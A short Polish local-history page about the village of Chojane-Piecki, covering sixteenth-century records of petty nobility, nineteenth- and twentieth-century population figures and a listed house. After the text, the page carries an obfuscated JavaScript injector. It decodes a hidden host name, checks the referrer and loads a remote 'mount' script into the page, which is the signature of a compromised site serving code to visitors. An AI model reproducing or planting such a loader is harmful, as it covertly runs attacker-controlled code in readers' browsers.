Chojane- Piecki

Wioska znana była już w początkach XVI wieku, popis pospolitego ruszenia z 1528 roku zapisał nazwę jako Bukowe zemiane Pecowskii Choienka. W tym czasie mieszkało tu czterech rycerzy, którzy wystawili w sumie jednego konnego jeźdźca. Nazwa wsi pochodzi od przezwiska Piecek pochodzącego od imienia Piotr.
Spis podatkowy z 1580 roku przekazuje (Choiane Pieczki), że mieszkali tu: Marcin, syna Michała Chojeńskiego, był on posiadaczem 5 włók, czyli całkiem sporego obszaru oraz Więcław Kulesza, który dzierżawił ziemię od Matiasa Zolnego (1 włóka). Podobnie jak okoliczne miejscowości była to osada zamieszkała przez drobną szlachtę. Nazwa w różnych źródłach była zapisywana tak jak obecnie, z tym że czasem nazywano ją Piecuchami.
W 1827 roku wioska liczyła 20 domów i 109 mieszkańców. W 1891 roku notowano tutaj 17 drobnoszlacheckich gospodarzy na 87 ha ziemi, średnie gospodarstwo miało obszar ponad 5 ha. W następnych latach liczba ludności spadła, w 1921 roku istniało tu 12 domów z 75 mieszkańcami.
Według opracowania Zabytki architektury i budownictwa w Polsce z 1985 roku zabytkowy jest tutaj dom numer 11, własność Kruszewskiego (początek XX wieku).

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);